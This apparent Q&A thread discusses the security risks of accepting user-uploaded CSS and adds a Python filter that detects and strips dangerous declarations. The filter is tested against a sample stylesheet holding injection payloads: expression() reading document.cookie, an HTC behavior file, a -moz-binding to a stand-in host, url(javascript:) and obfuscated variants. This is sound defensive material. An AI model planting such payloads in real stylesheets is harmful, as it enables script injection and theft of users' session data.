KoolKabin

Reputation: 17663

What things should be taken into account if we have to use an unknown user CSS file

I am thinking of letting users upload a CSS file and control the colour scheme and other things of the site as per their own configuration.

So before building it, I would like to know what things I should take care of?

Upvotes: 3

Views: 112

Answers (2)

bobince

Reputation: 536469

A CSS injection is nearly as good as script injection. You've got expression() in IE6-7 (and later in compatibility view), you've got behavior: (HTC) in IE, you've got -moz-binding: in Firefox, you've got content: to inject text, and occasionally, mostly in older browsers that don't block it, you've got url(javascript:...). Even without these you've got a fair amount of risk just from visual UI spoofing.

As long as a user stylesheet is limited to the user that made it, a user can only compromise themselves. The problem comes when users start sharing stylesheets. You might perhaps disallow users from picking the same external stylesheet address as another user to discourage this.

Upvotes: 4

Piskvor left the building

Reputation: 92772

Security: The so-called "CSS Expressions" allow JavaScript code in CSS. Although they are now deprecated, they still work in IE5-7, and in IE's compatibility modes.

I recommend stripping out any expression() rule from the stylesheet. It serves no real purpose, doesn't work in normal browsers and in IE it introduces executable code to CSS.

Upvotes: 2
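Both answers above name the same handful of constructs (expression(), behavior:, -moz-binding:, url(javascript:)). The following is an added example, not code from either answer: a small Python checker that first undoes comment-splitting and CSS hex escapes (the usual ways such tokens are hidden from naive filters) and then audits or strips the offending declarations. The stylesheet is constructed for the demo; the ";"-splitting is deliberately simple, and a production filter should parse with a real CSS parser and allow-list properties rather than rely on a blacklist, since that still leaves the UI-spoofing risk bobince mentions.

```python
import re

# Constructed sample upload: harmless rules mixed with the vectors named in the
# answers, two of them obfuscated with a comment split and a hex escape.
SAMPLE_CSS = r"""
body { background: #fafafa; color: #222; }
a:hover { color: red; width: expression(alert(document.cookie)); }
div.menu { behavior: url(evil.htc); }
.popup { -moz-binding: url("http://example.test/xbl.xml#ev"); }
h1 { background: url( javascript:alert(1) ); }
p { color: exp/**/ression(alert(2)); }
span { width: \65xpression(alert(3)); }
"""

# Patterns are applied to normalised text, so they can stay simple and case-insensitive.
DANGEROUS = [
    ("expression()", re.compile(r"expression\s*\(", re.I)),
    ("behavior:", re.compile(r"\bbehavior\s*:", re.I)),          # also matches -ms-behavior
    ("-moz-binding:", re.compile(r"-moz-binding\s*:", re.I)),
    ("url(javascript:)", re.compile(r"url\(\s*[\"']?\s*(javascript|vbscript)\s*:", re.I)),
]

def normalise(css: str) -> str:
    """Remove comments and decode \\HHHHHH hex escapes so split/escaped tokens reappear."""
    css = re.sub(r"/\*.*?\*/", "", css, flags=re.S)
    # CSS allows 1-6 hex digits followed by one optional whitespace character.
    return re.sub(r"\\([0-9a-fA-F]{1,6})\s?", lambda m: chr(int(m.group(1), 16)), css)

def audit_css(css: str) -> list[str]:
    """Return the names of the dangerous constructs present anywhere in the stylesheet."""
    flat = normalise(css)
    return [name for name, rx in DANGEROUS if rx.search(flat)]

def strip_dangerous_declarations(css: str) -> str:
    """Drop each 'property: value' declaration that matches a dangerous pattern.

    Splits on ';' only, so a ';' inside a quoted value would break a declaration in two;
    use a real CSS tokenizer for anything beyond a demonstration.
    """
    flat = normalise(css)

    def clean_block(m: re.Match) -> str:
        decls = [d for d in m.group(1).split(";") if d.strip()]
        kept = [d for d in decls if not any(rx.search(d + ";") for _, rx in DANGEROUS)]
        return "{" + ";".join(kept) + ("; }" if kept else " }")

    return re.sub(r"\{([^{}]*)\}", clean_block, flat)
```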
